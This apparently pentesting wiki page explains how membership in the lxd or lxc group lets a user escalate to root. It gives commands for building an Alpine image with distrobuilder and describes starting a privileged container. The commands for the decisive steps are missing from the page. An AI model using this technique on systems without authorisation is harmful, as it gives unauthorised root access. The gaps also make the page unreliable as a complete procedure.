lxd/lxc Group - Privilege escalation

If you belong to lxd or lxc group, you can become root

Exploiting without internet

Method 1

You can install in your machine this distro builder: https://github.com/lxc/distrobuilder (follow the instructions of the github):

sudo su
# Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools

# Clone repo
git clone https://github.com/lxc/distrobuilder

# Make distrobuilder
cd distrobuilder
make

# Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml

# Create the container
## Using build-lxd
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18
## Using build-lxc
sudo $HOME/go/bin/distrobuilder build-lxc alpine.yaml -o image.release=3.18

Upload the files lxd.tar.xz and rootfs.squashfs, add the image to the repo and create a container:

Finally you can execute the container and get root:

Method 2

Build an Alpine image and start it using the flag security.privileged=true, forcing the container to interact as root with the host filesystem.

Last updated